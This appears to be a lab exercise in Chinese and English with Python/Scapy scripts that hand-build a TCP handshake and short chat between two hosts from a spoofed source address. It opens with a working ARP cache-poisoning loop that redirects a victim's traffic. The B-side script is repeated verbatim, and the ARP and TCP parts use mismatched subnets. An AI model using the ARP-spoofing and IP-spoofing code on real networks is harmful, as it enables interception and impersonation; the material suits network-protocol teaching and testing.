A机
第三段网段用 222 还是 17,按实际环境修改:下面的 ARP 片段写的是 192.168.222.x,而后面的 TCP 脚本用的是 192.168.17.x,两处必须改成同一个网段,否则 B 的回包到不了 A。
ARP
# Machine A: poison the victim's ARP cache so that traffic for ghost_ip is
# delivered to this host's MAC.  ghost_ip is the spoofed source address the
# TCP scripts below send from; without this step B's replies never reach A.
# Lab / authorised-test use only.
victim_ip = "192.168.222.133"
ghost_ip = "192.168.222.17"

# Unsolicited ARP reply ("is-at" == op 2): "ghost_ip is at <our MAC>".
# hwsrc is left unset, so Scapy fills in this host's own MAC (the interface it
# routes pdst through, as far as I can tell) - set it explicitly on a
# multi-homed box if the poisoning does not take.
arp_pkt = ARP(op="is-at", pdst=victim_ip, psrc=ghost_ip)

banner = f"开始 ARP 欺骗: {ghost_ip} is at My_MAC ..."
print(banner)

# Resend once a second so the bogus entry does not age out; loop=True runs
# until interrupted.  Nothing here restores the victim's cache afterwards -
# the entry simply expires on its own.
send(arp_pkt, loop=True, inter=1.0, verbose=False)
from scapy.all import *
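# Network constants for the A side.
A_IP = "192.168.17.128"
B_IP = "192.168.17.129"
SRC_IP = "192.168.17.17"
A_PORT = 40033
B_PORT = 30033
# SRC_IP is an address no host owns: every segment is crafted with it, so A's
# own kernel never sees a connection it did not open and (presumably) never
# RSTs B's replies.  This relies on the ARP-poisoning step so that B delivers
# SRC_IP traffic to A's MAC - confirm in your lab.  A_IP is not used here.

# A's initial sequence number.  A fixed, predictable ISN only works against the
# scripted B peer; a real stack randomises its ISN (RFC 6528), which is why the
# ACK numbers below are derived from the SYN-ACK actually received instead of
# being hard-coded.
A_ISN = 1000

# Step 1 (A -> B): SYN, first leg of the handshake.
syn = IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="S", seq=A_ISN)
send(syn)

# Wait for B's SYN-ACK.  tcp[13] is the TCP flags byte; 0x12 = SYN|ACK, so a
# kernel RST from B (nothing listens on B_PORT there) is ignored rather than
# mistaken for the reply.  src/dst qualifiers stop A's own outgoing segments
# from matching.  sniff() starts only after send(): fine while B's reply is
# driven by hand from the other script, but a fast automatic peer could answer
# before the capture is up.
syn_filter = f"src host {B_IP} and tcp dst port {A_PORT} and tcp[13] & 18 == 18"
syn_pkts = sniff(filter=syn_filter, count=1, timeout=5)
if not syn_pkts:
    raise SystemExit("no SYN-ACK from B within 5s")
syn_ack = syn_pkts[0]
print(f"✅ 收到SYN-ACK: seq={syn_ack[TCP].seq}, ack={syn_ack[TCP].ack}")

# Sequence accounting: our SYN consumed one sequence number, and so did B's.
# ack is taken from the received SYN-ACK, not assumed to be 2001.
a_seq = A_ISN + 1
a_ack = syn_ack[TCP].seq + 1

# Step 3 (A -> B): final ACK, handshake complete.
send(IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="A", seq=a_seq, ack=a_ack))

# Step 5 (A -> B): first chat message.  The ACK carried no data, so the data
# segment reuses a_seq.  Kept as str like the rest of the page; Scapy encodes
# it when building, so len(msg_a) equals the wire length only for pure ASCII.
msg_a = "Hello B I am 17!\n"
pkt_a = IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="PA", seq=a_seq, ack=a_ack)/Raw(load=msg_a)
send(pkt_a)

# Wait up to 20 s for B's reply carrying data (PSH|ACK = 0x18).  B's bare ACK
# (0x10 only) does not match this filter.
resp_filter = f"src host {B_IP} and tcp dst port {A_PORT} and tcp[13] & 24 == 24"
resp_pkts = sniff(filter=resp_filter, count=1, timeout=20)
if not resp_pkts:
    raise SystemExit("no data reply from B within 20s")
resp_b = resp_pkts[0]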
==================================================================================
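# Step 6 (A -> B): acknowledge B's reply, then send the second message.
# Length of B's data.  The PSH|ACK filter makes a Raw layer very likely, but a
# data-less segment would otherwise raise here, so guard it.
msg_b_len = len(resp_b[Raw].load) if Raw in resp_b else 0

# Next seq = seq of the first data segment we sent plus its wire length
# (bytes(...) is the encoded payload, so the count is right even for
# non-ASCII text).  Next ack = B's data seq plus the bytes B sent.
next_seq = pkt_a[TCP].seq + len(bytes(pkt_a[Raw]))
next_ack = resp_b[TCP].seq + msg_b_len

# Bare ACK for B's reply.
ack_pkt = IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="A",
seq=next_seq, ack=next_ack)
send(ack_pkt)

# Second message; same seq as the bare ACK, which consumed no sequence space.
msg2 = "How are you B?\n"
pkt2 = IP(src=SRC_IP, dst=B_IP)/TCP(sport=A_PORT, dport=B_PORT, flags="PA",
seq=next_seq, ack=next_ack)/Raw(load=msg2)
send(pkt2)

# Wait for B to acknowledge the second message (0x10 = ACK; a PSH|ACK data
# segment also matches).  Check the ack number actually covers what we sent
# rather than trusting any ACK from B.
expected_ack = next_seq + len(bytes(pkt2[Raw]))
ack_filter = f"src host {B_IP} and tcp dst port {A_PORT} and tcp[13] & 16 == 16"
ack_pkts = sniff(filter=ack_filter, count=1, timeout=10)
if not ack_pkts:
    raise SystemExit("no ACK from B for the second message within 10s")
if ack_pkts[0][TCP].ack != expected_ack:
    print(f"unexpected ack from B: got {ack_pkts[0][TCP].ack}, expected {expected_ack}")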
from scapy.all import *
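# Network constants for the B side.
B_IP = "192.168.17.129"
SRC_IP = "192.168.17.17"
A_PORT = 40033
B_PORT = 30033
# B's initial sequence number.  Fixed and predictable - acceptable for a
# scripted lab peer, never for real traffic (RFC 6528).
B_ISN = 2000

# Step 2 (B -> A): SYN-ACK, second leg of the handshake.
# ack is hard-coded to A's ISN + 1 (1000 + 1): this script never looks at A's
# SYN, so it has to be started by hand right after A sends (A waits only 5 s
# for this reply, judging by the timeouts).  B's own kernel is not part of
# this hand-rolled connection: with nothing listening on B_PORT it may answer
# A's segments with RST - on Linux a netfilter rule dropping outbound RST from
# B_PORT is the usual lab workaround; confirm whether it is needed here.
syn_ack_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="SA", seq=B_ISN, ack=1001)
send(syn_ack_pkt)

# Step 4: wait for A's data segment (PSH|ACK = 0x18).  src/dst qualifiers keep
# B's own outgoing segments to A from matching.
filter_str = f"src host {SRC_IP} and tcp dst port {B_PORT} and tcp[13] & 24 == 24"
pkts = sniff(filter=filter_str, count=1, timeout=30)
if not pkts:
    raise SystemExit("no data from A within 30s")
pkt_from_a = pkts[0]
# Bytes A sent; guard against a data-less segment instead of raising.
msg_a_len = len(pkt_from_a[Raw].load) if Raw in pkt_from_a else 0

# Step 6 (B -> A): bare ACK first, then B's own message.
# Our seq is whatever A expects next (its ack field); our ack is A's seq plus
# the bytes it sent.  Both come from the received segment, not from constants.
ack_seq = pkt_from_a[TCP].ack
ack_ack = pkt_from_a[TCP].seq + msg_a_len
if ack_seq != B_ISN + 1:
    print(f"A acknowledges {ack_seq}, expected {B_ISN + 1}; seq numbers are out of step")
ack_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="A", seq=ack_seq, ack=ack_ack)
send(ack_pkt)

# 6b. B's reply.  The data segment reuses ack_seq because the bare ACK above
# carried no data and so consumed no sequence space.
msg_b = "Hello 23 I am B\n"
msg_b_len = len(msg_b)
data_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="PA", seq=ack_seq, ack=ack_ack)/Raw(load=msg_b)
send(data_pkt)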
==================================================================================
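# After B's reply has gone out, wait for A's second message, ACK it, and send
# one more line.
# B's next seq = seq of the data segment just sent plus its wire length
# (bytes(...) gives the encoded payload, so this holds for non-ASCII text too).
current_b_seq = data_pkt[TCP].seq + len(bytes(data_pkt[Raw]))

# 1. A's second data segment (PSH|ACK = 0x18).  src/dst qualifiers keep B's
#    own outgoing data_pkt from matching if the capture were already running.
filter_howareyou = f"src host {SRC_IP} and tcp dst port {B_PORT} and tcp[13] & 24 == 24"
pkts_howareyou = sniff(filter=filter_howareyou, count=1, timeout=30)
if not pkts_howareyou:
    raise SystemExit("no second message from A within 30s")
pkt_howareyou = pkts_howareyou[0]
# Guard a data-less segment instead of raising on a missing Raw layer.
howareyou_len = len(pkt_howareyou[Raw].load) if Raw in pkt_howareyou else 0

# 2. ack = A's seq plus the bytes it sent.
ack_num_howareyou = pkt_howareyou[TCP].seq + howareyou_len

# 3. Bare ACK for A's data.
ack_pkt_howareyou = IP(dst=SRC_IP)/TCP(
sport=B_PORT,
dport=A_PORT,
flags="A",
seq=current_b_seq,
ack=ack_num_howareyou
)
send(ack_pkt_howareyou)

# 4. B's final message; same seq as the bare ACK, which consumed no sequence
#    space.
msg_fine = "fine 17\n"
msg_fine_len = len(msg_fine)
data_pkt_fine = IP(dst=SRC_IP)/TCP(
sport=B_PORT,
dport=A_PORT,
flags="PA",
seq=current_b_seq,
ack=ack_num_howareyou
)/Raw(load=msg_fine)
send(data_pkt_fine)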
from scapy.all import *
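# Network constants for the B side.
B_IP = "192.168.17.129"
SRC_IP = "192.168.17.17"
A_PORT = 40033
B_PORT = 30033
# B's initial sequence number.  Fixed and predictable - acceptable for a
# scripted lab peer, never for real traffic (RFC 6528).
B_ISN = 2000

# Step 2 (B -> A): SYN-ACK, second leg of the handshake.
# ack is hard-coded to A's ISN + 1 (1000 + 1): this script never looks at A's
# SYN, so it has to be started by hand right after A sends (A waits only 5 s
# for this reply, judging by the timeouts).  B's own kernel is not part of
# this hand-rolled connection: with nothing listening on B_PORT it may answer
# A's segments with RST - on Linux a netfilter rule dropping outbound RST from
# B_PORT is the usual lab workaround; confirm whether it is needed here.
syn_ack_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="SA", seq=B_ISN, ack=1001)
send(syn_ack_pkt)

# Step 4: wait for A's data segment (PSH|ACK = 0x18).  src/dst qualifiers keep
# B's own outgoing segments to A from matching.
filter_str = f"src host {SRC_IP} and tcp dst port {B_PORT} and tcp[13] & 24 == 24"
pkts = sniff(filter=filter_str, count=1, timeout=30)
if not pkts:
    raise SystemExit("no data from A within 30s")
pkt_from_a = pkts[0]
# Bytes A sent; guard against a data-less segment instead of raising.
msg_a_len = len(pkt_from_a[Raw].load) if Raw in pkt_from_a else 0

# Step 6 (B -> A): bare ACK first, then B's own message.
# Our seq is whatever A expects next (its ack field); our ack is A's seq plus
# the bytes it sent.  Both come from the received segment, not from constants.
ack_seq = pkt_from_a[TCP].ack
ack_ack = pkt_from_a[TCP].seq + msg_a_len
if ack_seq != B_ISN + 1:
    print(f"A acknowledges {ack_seq}, expected {B_ISN + 1}; seq numbers are out of step")
ack_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="A", seq=ack_seq, ack=ack_ack)
send(ack_pkt)

# 6b. B's reply.  The data segment reuses ack_seq because the bare ACK above
# carried no data and so consumed no sequence space.
msg_b = "Hello 23 I am B\n"
msg_b_len = len(msg_b)
data_pkt = IP(dst=SRC_IP)/TCP(sport=B_PORT, dport=A_PORT, flags="PA", seq=ack_seq, ack=ack_ack)/Raw(load=msg_b)
send(data_pkt)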
==================================================================================
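# After B's reply has gone out, wait for A's second message, ACK it, and send
# one more line.
# B's next seq = seq of the data segment just sent plus its wire length
# (bytes(...) gives the encoded payload, so this holds for non-ASCII text too).
current_b_seq = data_pkt[TCP].seq + len(bytes(data_pkt[Raw]))

# 1. A's second data segment (PSH|ACK = 0x18).  src/dst qualifiers keep B's
#    own outgoing data_pkt from matching if the capture were already running.
filter_howareyou = f"src host {SRC_IP} and tcp dst port {B_PORT} and tcp[13] & 24 == 24"
pkts_howareyou = sniff(filter=filter_howareyou, count=1, timeout=30)
if not pkts_howareyou:
    raise SystemExit("no second message from A within 30s")
pkt_howareyou = pkts_howareyou[0]
# Guard a data-less segment instead of raising on a missing Raw layer.
howareyou_len = len(pkt_howareyou[Raw].load) if Raw in pkt_howareyou else 0

# 2. ack = A's seq plus the bytes it sent.
ack_num_howareyou = pkt_howareyou[TCP].seq + howareyou_len

# 3. Bare ACK for A's data.
ack_pkt_howareyou = IP(dst=SRC_IP)/TCP(
sport=B_PORT,
dport=A_PORT,
flags="A",
seq=current_b_seq,
ack=ack_num_howareyou
)
send(ack_pkt_howareyou)

# 4. B's final message; same seq as the bare ACK, which consumed no sequence
#    space.
msg_fine = "fine 17\n"
msg_fine_len = len(msg_fine)
data_pkt_fine = IP(dst=SRC_IP)/TCP(
sport=B_PORT,
dport=A_PORT,
flags="PA",
seq=current_b_seq,
ack=ack_num_howareyou
)/Raw(load=msg_fine)
send(data_pkt_fine)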